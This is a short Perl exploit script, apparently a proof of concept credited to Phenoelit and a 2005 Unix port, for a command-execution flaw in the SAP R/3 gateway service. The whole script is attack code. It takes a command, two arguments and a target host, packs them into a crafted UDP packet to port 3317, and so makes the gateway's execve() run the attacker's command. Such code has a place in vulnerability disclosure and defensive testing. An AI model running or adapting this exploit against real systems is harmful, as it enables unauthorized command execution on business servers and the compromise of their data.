#!/usr/bin/perl -w
use IO::Socket;

# Unix version of the FX SAP R/3 gwrd vuln.
#
# We partially control a call to excve() made by lnaxdm/sapsys
# Easily exploitable with local access
# Could be done remotely under some conditions
#
# 2003, FX of Phenoelit <fx@phenoelit.de> (Win32 original code)
# 2005, Nicob <nicob@nicob.net> (Unix version)
#

$|=1;

die "Give filename" unless ($command=shift);
die "Give arg1" unless ($param1=shift);
die "Give arg3" unless ($param3=shift);
die "Arg1 too long" if (length($param1) > 8);
die "Arg3 too long" if (length($param3) > 8);
die "Give host" unless ($host=shift);

$port="3317" unless ($port=shift);

$request = 
	"\x01".
	"\x02".
	"BBBBBBBBBB".
	"BBBBBBBBBB".
	"BBBBBBBBBB".
	"BBBBBBBBBB".
	"BBBBBBBBBB".

	# Second arg to execve()
	# 8 chars long
	$param1.
	" " x (8 - length($param1)).
	
	"_0_0_0_0_0_".

	# Fourth arg to execve()
	# 8 chars long
	$param3.
	" " x (8 - length($param3)).

	"_1_1_1_1_1__2_2_2_2_2".

	# First arg to execve()
	# Unlimted length, end with %00
	$command."\x00";

&send_UDP($host,$port);

exit 0;

sub send_UDP {
    my $remote;
    my $rline;
    my $dest;
    my $port;

    ($dest,$port) = @_;

    $remote =
      IO::Socket::INET->new(Proto=>"udp",PeerAddr=>$dest,PeerPort=>"$port",);
    unless ($remote) { die "cannot get socket for $dest" }
    $remote->autoflush(1);
    print $remote $request;

    close $remote;
}